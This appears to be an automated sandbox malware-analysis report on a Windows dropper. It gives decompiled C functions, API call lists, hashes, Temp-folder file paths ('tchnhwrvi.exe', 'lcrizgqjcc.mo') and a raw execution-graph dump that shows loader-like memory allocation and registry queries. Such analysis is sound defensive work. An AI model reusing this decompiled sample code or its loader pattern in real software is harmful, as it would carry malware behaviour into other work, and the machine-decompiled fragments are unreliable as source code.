                    			E00401E4E(intOrPtr __edx) {
                    				void* __edi;
                    				int _t9;
                    				signed char _t15;
                    				struct HFONT__* _t18;
                    				intOrPtr _t30;
                    				void* _t31;
                    				struct HDC__* _t33;
                    				void* _t35;
                    
                    				_t30 = __edx;
                    				_t33 = GetDC( *(_t35 - 8));
                    				_t9 = E00402D84(2);
                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                    				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                    				ReleaseDC( *(_t35 - 8), _t33);
                    				 *0x40ce08 = E00402D84(3);
                    				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                    				 *0x40ce0f = 1;
                    				 *0x40ce0c = _t15 & 0x00000001;
                    				 *0x40ce0d = _t15 & 0x00000002;
                    				 *0x40ce0e = _t15 & 0x00000004;
                    				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                    				_t18 = CreateFontIndirectW(0x40cdf8);
                    				_push(_t18);
                    				_push(_t31);
                    				E004065AF();
                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                    				return 0;
                    			}












                    APIs
                    • GetDC.USER32(?), ref: 00401E51
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                    • ReleaseDC.USER32 ref: 00401E84
                      • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                    • String ID:
                    • API String ID: 2584051700-0
                    • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                    • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                    • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                    • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00401C43(intOrPtr __edx) {
                    				int _t29;
                    				long _t30;
                    				signed int _t32;
                    				WCHAR* _t35;
                    				long _t36;
                    				int _t41;
                    				signed int _t42;
                    				int _t46;
                    				int _t56;
                    				intOrPtr _t57;
                    				struct HWND__* _t63;
                    				void* _t64;
                    
                    				_t57 = __edx;
                    				_t29 = E00402D84(3);
                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    				 *(_t64 - 0x18) = _t29;
                    				_t30 = E00402D84(4);
                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    				 *(_t64 + 8) = _t30;
                    				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                    					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                    				}
                    				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                    				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                    					 *(_t64 + 8) = E00402DA6(0x44);
                    				}
                    				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                    				_push(1);
                    				if(__eflags != 0) {
                    					_t61 = E00402DA6();
                    					_t32 = E00402DA6();
                    					asm("sbb ecx, ecx");
                    					asm("sbb eax, eax");
                    					_t35 =  ~( *_t31) & _t61;
                    					__eflags = _t35;
                    					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                    					goto L10;
                    				} else {
                    					_t63 = E00402D84();
                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    					_t41 = E00402D84(2);
                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    					_t56 =  *(_t64 - 0x1c) >> 2;
                    					if(__eflags == 0) {
                    						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                    						L10:
                    						 *(_t64 - 0x38) = _t36;
                    					} else {
                    						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                    						asm("sbb eax, eax");
                    						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                    					}
                    				}
                    				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                    				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                    					_push( *(_t64 - 0x38));
                    					E004065AF();
                    				}
                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                    				return 0;
                    			}
















                    APIs
                    • SendMessageTimeoutW.USER32 ref: 00401CB3
                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                    • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                    • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                    • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                    				int _v8;
                    				long _t21;
                    				long _t24;
                    				char* _t30;
                    
                    				asm("sbb eax, eax");
                    				_v8 = 0x800;
                    				_t5 =  &_a4; // 0x422728
                    				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                    				_t30 = _a16;
                    				if(_t21 != 0) {
                    					L4:
                    					 *_t30 =  *_t30 & 0x00000000;
                    				} else {
                    					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                    					_t21 = RegCloseKey(_a20);
                    					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                    					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                    						goto L4;
                    					}
                    				}
                    				return _t21;
                    			}








                    APIs
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,?,?,0040679D,80000002), ref: 0040657C
                    • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00422728), ref: 00406587
                    Strings
                    • ('B, xrefs: 0040655B
                    • "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo, xrefs: 0040653D
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CloseQueryValue
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$('B
                    • API String ID: 3356406503-2931372168
                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E00405F37(WCHAR* _a4) {
                    				WCHAR* _t9;
                    
                    				_t9 = _a4;
                    				_push( &(_t9[lstrlenW(_t9)]));
                    				_push(_t9);
                    				if( *(CharPrevW()) != 0x5c) {
                    					lstrcatW(_t9, 0x40a014);
                    				}
                    				return _t9;
                    			}





                    APIs
                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CharPrevlstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 2659869361-3081826266
                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                    				int _t15;
                    				long _t16;
                    
                    				_t15 = _a8;
                    				if(_t15 != 0x102) {
                    					if(_t15 != 0x200) {
                    						_t16 = _a16;
                    						L7:
                    						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                    							_push(_t16);
                    							_push(6);
                    							 *0x423734 = _t16;
                    							E00404FFF();
                    						}
                    						L11:
                    						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                    					}
                    					if(IsWindowVisible(_a4) == 0) {
                    						L10:
                    						_t16 = _a16;
                    						goto L11;
                    					}
                    					_t16 = E00404F7F(_a4, 1);
                    					_t15 = 0x419;
                    					goto L7;
                    				}
                    				if(_a12 != 0x20) {
                    					goto L10;
                    				}
                    				E00404610(0x413);
                    				return 0;
                    			}






                    APIs
                    • IsWindowVisible.USER32 ref: 0040566D
                    • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                      • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                    • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                    • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                    • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                    				int _v8;
                    				int _t12;
                    				int _t14;
                    				int _t15;
                    				CHAR* _t17;
                    				CHAR* _t27;
                    
                    				_t12 = lstrlenA(_a8);
                    				_t27 = _a4;
                    				_v8 = _t12;
                    				while(lstrlenA(_t27) >= _v8) {
                    					_t14 = _v8;
                    					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                    					_t15 = lstrcmpiA(_t27, _a8);
                    					_t27[_v8] =  *(_t14 + _t27);
                    					if(_t15 == 0) {
                    						_t17 = _t27;
                    					} else {
                    						_t27 = CharNextA(_t27);
                    						continue;
                    					}
                    					L5:
                    					return _t17;
                    				}
                    				_t17 = 0;
                    				goto L5;
                    			}










                    APIs
                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                    • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                    • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                    • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                    • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                    • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:16.6%
                    Dynamic/Decrypted Code Coverage:7.8%
                    Signature Coverage:4.6%
                    Total number of Nodes:1667
                    Total number of Limit Nodes:34
7633->7634 7635 28a580 7634->7635 7637 283cf8 __write_nolock 65 API calls 7635->7637 7636 28620b __FF_MSGBANNER 65 API calls 7640 28a516 7636->7640 7648 28a572 7637->7648 7638 28a539 RtlAllocateHeap 7638->7641 7638->7648 7639 28605c __NMSG_WRITE 65 API calls 7639->7640 7640->7636 7640->7639 7640->7641 7644 285d76 __mtinitlocknum 3 API calls 7640->7644 7641->7638 7641->7640 7642 28a566 7641->7642 7645 28a030 _malloc DecodePointer 7641->7645 7646 28a564 7641->7646 7643 283cf8 __write_nolock 65 API calls 7642->7643 7643->7646 7644->7640 7645->7641 7647 283cf8 __write_nolock 65 API calls 7646->7647 7647->7648 7648->7551 7649->7557 7650->7470 7651->7485 7653 2891f2 EncodePointer 7652->7653 7653->7653 7654 28920c 7653->7654 7654->7321 7658 28a13f 7655->7658 7657 28a188 7657->7323 7659 28a14b __mtinitlocknum 7658->7659 7666 285d8e 7659->7666 7665 28a16c __mtinitlocknum 7665->7657 7667 286fb4 __lock 66 API calls 7666->7667 7668 285d95 7667->7668 7669 28a058 DecodePointer DecodePointer 7668->7669 7670 28a107 7669->7670 7671 28a086 7669->7671 7680 28a175 7670->7680 7671->7670 7683 28ba87 7671->7683 7673 28a0ea EncodePointer EncodePointer 7673->7670 7674 28a0bc 7674->7670 7677 286d16 __realloc_crt 70 API calls 7674->7677 7678 28a0d8 EncodePointer 7674->7678 7675 28a098 7675->7673 7675->7674 7690 286d16 7675->7690 7679 28a0d2 7677->7679 7678->7673 7679->7670 7679->7678 7716 285d97 7680->7716 7684 28ba92 7683->7684 7685 28baa7 HeapSize 7683->7685 7686 283cf8 __write_nolock 66 API calls 7684->7686 7685->7675 7687 28ba97 7686->7687 7688 283ca6 __write_nolock 11 API calls 7687->7688 7689 28baa2 7688->7689 7689->7675 7692 286d1f 7690->7692 7693 286d5e 7692->7693 7694 286d3f Sleep 7692->7694 7695 28a613 7692->7695 7693->7674 7694->7692 7696 28a629 7695->7696 7697 28a61e 7695->7697 7699 28a631 7696->7699 7707 28a63e 7696->7707 7698 28a4fd _malloc 66 API calls 7697->7698 7700 28a626 7698->7700 7701 286d64 _free 66 API calls 7699->7701 7700->7692 7715 28a639 __dosmaperr 7701->7715 7702 
28a676 7703 28a030 _malloc DecodePointer 7702->7703 7705 28a67c 7703->7705 7704 28a646 HeapReAlloc 7704->7707 7704->7715 7708 283cf8 __write_nolock 66 API calls 7705->7708 7706 28a6a6 7710 283cf8 __write_nolock 66 API calls 7706->7710 7707->7702 7707->7704 7707->7706 7709 28a030 _malloc DecodePointer 7707->7709 7712 28a68e 7707->7712 7708->7715 7709->7707 7711 28a6ab GetLastError 7710->7711 7711->7715 7713 283cf8 __write_nolock 66 API calls 7712->7713 7714 28a693 GetLastError 7713->7714 7714->7715 7715->7692 7719 286edb LeaveCriticalSection 7716->7719 7718 285d9e 7718->7665 7719->7718 7849 282c80 7720->7849 7722 282913 7723 28335f 7722->7723 7727 28336b __mtinitlocknum 7723->7727 7724 283377 7725 283cf8 __write_nolock 66 API calls 7724->7725 7728 28337c 7725->7728 7726 28339d 8499 283652 7726->8499 7727->7724 7727->7726 7730 283ca6 __write_nolock 11 API calls 7728->7730 7734 283387 __mtinitlocknum 7730->7734 7734->7333 7737 28327c __mtinitlocknum 7736->7737 7738 283288 7737->7738 7739 28329d 7737->7739 7740 283cf8 __write_nolock 66 API calls 7738->7740 7741 283652 __lock_file 67 API calls 7739->7741 7743 28328d 7740->7743 7742 2832a5 7741->7742 7744 2830dc __ftell_nolock 71 API calls 7742->7744 7745 283ca6 __write_nolock 11 API calls 7743->7745 7746 2832b2 7744->7746 7748 283298 __mtinitlocknum 7745->7748 8579 2832cb 7746->8579 7748->7337 8582 283031 7749->8582 7751 28294c 7752 5f122c 7751->7752 7757 5f0f9c 7751->7757 7753 5f1233 7752->7753 7754 5f123f 7753->7754 7756 5f16e6 ExitProcess 7753->7756 8678 5f08ef 7753->8678 7754->7327 8766 5f005f GetPEB 7757->8766 7759 5f10e9 8767 5f0f1d 7759->8767 7761 5f10f1 7762 5f1196 7761->7762 8780 5f0422 7761->8780 7762->7327 7765 5f11f0 VirtualAlloc ReadFile 7765->7762 7768 5f1226 7765->7768 7766 5f123f 7766->7327 7767 5f08ef 15 API calls 7767->7768 7768->7766 7768->7767 7769 5f16e6 ExitProcess 7768->7769 7771 281661 GetSystemMetrics 7770->7771 8826 28c060 7771->8826 7775 281763 RegQueryValueExW 7777 28179b RegQueryValueExW 
7775->7777 7778 28178d 7775->7778 7776 281c35 7776->7334 7779 2817ba 7777->7779 7780 2817c7 RegQueryValueExW 7777->7780 7778->7777 7779->7780 7781 2817f4 RegQueryValueExW 7780->7781 7782 2817e6 7780->7782 7783 28181e RegQueryValueExW 7781->7783 7784 281813 7781->7784 7782->7781 7785 281848 RegQueryValueExW 7783->7785 7786 28183d 7783->7786 7784->7783 7787 281875 RegQueryValueExW 7785->7787 7788 281867 7785->7788 7786->7785 7789 2818a2 RegQueryValueExW 7787->7789 7790 281894 7787->7790 7788->7787 7791 2818ce RegQueryValueExW 7789->7791 7792 2818c1 7789->7792 7790->7789 7793 2818fb RegQueryValueExW 7791->7793 7794 2818ed 7791->7794 7792->7791 7795 281928 RegQueryValueExW 7793->7795 7796 28191a 7793->7796 7794->7793 7797 281954 RegQueryValueExW 7795->7797 7798 281947 7795->7798 7796->7795 7799 281981 RegQueryValueExW 7797->7799 7800 281973 7797->7800 7798->7797 7801 2819ae RegQueryValueExW 7799->7801 7802 2819a0 7799->7802 7800->7799 7803 2819da RegQueryValueExW 7801->7803 7804 2819cd 7801->7804 7802->7801 7805 2819f9 7803->7805 7806 281a07 RegQueryValueExW 7803->7806 7804->7803 7805->7806 7807 281a34 RegQueryValueExW 7806->7807 7808 281a26 7806->7808 7809 281a60 RegQueryValueExW 7807->7809 7810 281a53 7807->7810 7808->7807 7811 281a8d RegQueryValueExW 7809->7811 7812 281a7f 7809->7812 7810->7809 7813 281aba RegQueryValueExW 7811->7813 7814 281aac 7811->7814 7812->7811 7815 281ad9 7813->7815 7816 281ae6 RegQueryValueExW 7813->7816 7814->7813 7815->7816 7817 281b13 RegQueryValueExW 7816->7817 7818 281b05 7816->7818 7819 281b4e 7817->7819 7820 281b74 RegQueryValueExW 7817->7820 7818->7817 7819->7820 8828 281020 RegOpenKeyW 7819->8828 7821 281b9a 7820->7821 7822 281bb2 RegQueryValueExW 7820->7822 7821->7822 7824 281ba0 lstrcpyW 7821->7824 7825 281bd9 7822->7825 7826 281bf1 RegQueryValueExW 7822->7826 7824->7822 7825->7826 7830 281bdf lstrcpyW 7825->7830 7827 281c2b RegCloseKey 7826->7827 7828 281c13 7826->7828 7827->7776 7828->7827 7831 281c19 lstrcpyW 7828->7831 
7830->7826 7831->7827 7832->7350 7834 2826a5 7833->7834 7835 282792 lstrlenW 7834->7835 7836 2827d4 InvalidateRect 7834->7836 7841 2827f6 7834->7841 7837 2827b3 lstrcatW 7835->7837 7836->7841 7839 2827d0 7837->7839 7839->7836 7840 282803 7839->7840 8833 282610 LoadStringW wsprintfW LoadStringW MessageBoxW 7840->8833 7841->7353 7843 28280f 7844 28288a DestroyWindow 7843->7844 7845 282814 7843->7845 7844->7841 7845->7841 7846 282819 lstrcpyW GetFileTitleW CreateFileW 7845->7846 7847 28287d 7846->7847 7848 282876 CloseHandle 7846->7848 7847->7353 7848->7847 7852 282c8c __mtinitlocknum 7849->7852 7850 282c9f 7851 283cf8 __write_nolock 66 API calls 7850->7851 7853 282ca4 7851->7853 7852->7850 7854 282ccd 7852->7854 7855 283ca6 __write_nolock 11 API calls 7853->7855 7868 2839e9 7854->7868 7864 282caf __mtinitlocknum @_EH4_CallFilterFunc@8 7855->7864 7857 282cd2 7858 282cd9 7857->7858 7859 282ce6 7857->7859 7860 283cf8 __write_nolock 66 API calls 7858->7860 7861 282d0e 7859->7861 7862 282cee 7859->7862 7860->7864 7885 283730 7861->7885 7865 283cf8 __write_nolock 66 API calls 7862->7865 7864->7722 7865->7864 7869 2839f5 __mtinitlocknum 7868->7869 7870 286fb4 __lock 66 API calls 7869->7870 7883 283a03 7870->7883 7871 283a78 7908 283b13 7871->7908 7872 283a7f 7873 286c85 __malloc_crt 66 API calls 7872->7873 7875 283a86 7873->7875 7875->7871 7877 283a94 InitializeCriticalSectionAndSpinCount 7875->7877 7876 283b08 __mtinitlocknum 7876->7857 7878 283ab4 7877->7878 7879 283ac7 EnterCriticalSection 7877->7879 7882 286d64 _free 66 API calls 7878->7882 7879->7871 7880 286ef2 __mtinitlocknum 66 API calls 7880->7883 7882->7871 7883->7871 7883->7872 7883->7880 7911 283693 7883->7911 7916 283701 7883->7916 7886 283752 7885->7886 7887 28376d 7886->7887 7899 283784 __wopenfile 7886->7899 7889 283cf8 __write_nolock 66 API calls 7887->7889 7888 283939 7891 283992 7888->7891 7892 2839a4 7888->7892 7890 283772 7889->7890 7893 283ca6 __write_nolock 11 API calls 7890->7893 7894 283cf8 
__write_nolock 66 API calls 7891->7894 7923 2877e0 7892->7923 7897 282d19 7893->7897 7896 283997 7894->7896 7898 283ca6 __write_nolock 11 API calls 7896->7898 7905 282d34 7897->7905 7898->7897 7899->7888 7899->7891 7926 2878e5 7899->7926 7902 2878e5 __wcsnicmp 78 API calls 7903 283951 7902->7903 7903->7888 7904 2878e5 __wcsnicmp 78 API calls 7903->7904 7904->7888 8492 2836c5 7905->8492 7907 282d3c 7907->7864 7921 286edb LeaveCriticalSection 7908->7921 7910 283b1a 7910->7876 7912 2836a0 7911->7912 7913 2836b6 EnterCriticalSection 7911->7913 7914 286fb4 __lock 66 API calls 7912->7914 7913->7883 7915 2836a9 7914->7915 7915->7883 7917 283711 7916->7917 7918 283724 LeaveCriticalSection 7916->7918 7922 286edb LeaveCriticalSection 7917->7922 7918->7883 7920 283721 7920->7883 7921->7910 7922->7920 7934 28771c 7923->7934 7925 2877fb 7925->7897 7927 28796d 7926->7927 7928 2878f4 7926->7928 8382 287800 7927->8382 7930 283932 7928->7930 7931 283cf8 __write_nolock 66 API calls 7928->7931 7930->7888 7930->7902 7932 28790b 7931->7932 7933 283ca6 __write_nolock 11 API calls 7932->7933 7933->7930 7937 287728 __mtinitlocknum 7934->7937 7935 28773b 7936 283cf8 __write_nolock 66 API calls 7935->7936 7938 287740 7936->7938 7937->7935 7939 287771 7937->7939 7941 283ca6 __write_nolock 11 API calls 7938->7941 7945 286fe7 7939->7945 7944 28774a __mtinitlocknum 7941->7944 7942 28778b 8052 2877b2 7942->8052 7944->7925 7946 28700e 7945->7946 8056 28ab72 7946->8056 7948 287299 7949 283c54 __invoke_watson 10 API calls 7948->7949 7951 28771b __mtinitlocknum 7949->7951 7950 287069 8081 283d0b 7950->8081 7954 28773b 7951->7954 7961 287771 7951->7961 7953 28702a 7953->7948 7953->7950 7958 2870c4 7953->7958 7956 283cf8 __write_nolock 66 API calls 7954->7956 7959 287740 7956->7959 7957 283cf8 __write_nolock 66 API calls 7960 287078 7957->7960 7963 28714b 7958->7963 7972 28711e 7958->7972 7964 283ca6 __write_nolock 11 API calls 7959->7964 7965 283ca6 __write_nolock 11 API calls 7960->7965 7962 286fe7 
